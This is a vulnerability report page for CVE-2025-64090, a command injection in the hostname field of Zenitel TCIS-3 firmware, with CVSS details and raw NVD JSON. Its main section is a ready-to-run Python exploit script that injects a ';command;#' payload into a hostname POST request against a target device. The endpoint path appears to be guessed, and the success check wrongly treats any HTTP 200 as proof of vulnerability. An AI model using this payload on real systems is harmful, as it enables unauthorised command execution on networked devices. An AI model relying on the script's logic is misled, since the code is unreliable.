Security Vulnerability Report
中文
CVE-2025-64090 CVSS 10.0 CRITICAL

CVE-2025-64090

Published: 2026-01-09 10:15:46
Last Modified: 2026-02-12 17:45:05

Description

This vulnerability allows authenticated attackers to execute commands via the hostname of the device.

CVSS Details

CVSS Score
10.0
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:zenitel:tcis-3_firmware:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:zenitel:tcis-3:-:*:*:*:*:*:*:* - NOT VULNERABLE
Zenitel设备固件版本 < 最新安全补丁版本

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-64090 PoC - Zenitel设备hostname命令注入 # 注意:此PoC仅供安全研究和授权测试使用 import requests import sys def exploit_zenitel_hostname_rce(target_url, hostname_payload): """ 尝试通过hostname参数注入命令 Args: target_url: 目标设备的管理界面URL hostname_payload: 恶意构造的hostname值 Returns: bool: 漏洞利用是否成功 """ # 构造HTTP请求,设置恶意hostname headers = { 'Content-Type': 'application/x-www-form-urlencoded', 'Authorization': 'Bearer <your_auth_token>' # 需要有效的认证令牌 } data = { 'hostname': hostname_payload, 'action': 'save' } try: response = requests.post( f'{target_url}/api/system/hostname', headers=headers, data=data, timeout=10, verify=False ) if response.status_code == 200: print('[+] Request sent successfully') # 检查命令执行结果 if 'command executed' in response.text.lower() or response.status_code == 200: print('[+] Vulnerability may be present') return True return False except requests.exceptions.RequestException as e: print(f'[-] Error: {e}') return False if __name__ == '__main__': if len(sys.argv) < 3: print('Usage: python cve-2025-64090.py <target_url> <command>') print('Example: python cve-2025-64090.py https://target.com "id"') sys.exit(1) target = sys.argv[1] command = sys.argv[2] # 构造命令注入payload # 示例:利用hostname执行系统命令 payload = f';{command};#' print(f'[*] Exploiting CVE-2025-64090') print(f'[*] Target: {target}') print(f'[*] Payload: {payload}') exploit_zenitel_hostname_rce(target, payload)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-64090", "sourceIdentifier": "[email protected]", "published": "2026-01-09T10:15:46.480", "lastModified": "2026-02-12T17:45:04.993", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "This vulnerability allows authenticated attackers to execute commands via the hostname of the device."}, {"lang": "es", "value": "Esta vulnerabilidad permite a atacantes autenticados ejecutar comandos a través del nombre de host del dispositivo."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "baseScore": 10.0, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 6.0}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-77"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:zenitel:tcis-3_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "9.2.3.3", "matchCriteriaId": "1B689976-D6D7-4D27-907B-9866767A4045"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:zenitel:tcis-3:-:*:*:*:*:*:*:*", "matchCriteriaId": "E46C75FA-422D-4C09-80E3-D946D65F078E"}]}]}], "references": [{"url": "https://www.zenitel.com/sites/default/files/2025-12/A100K12333%20Zenitel%20Security%20Advisory.pdf", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}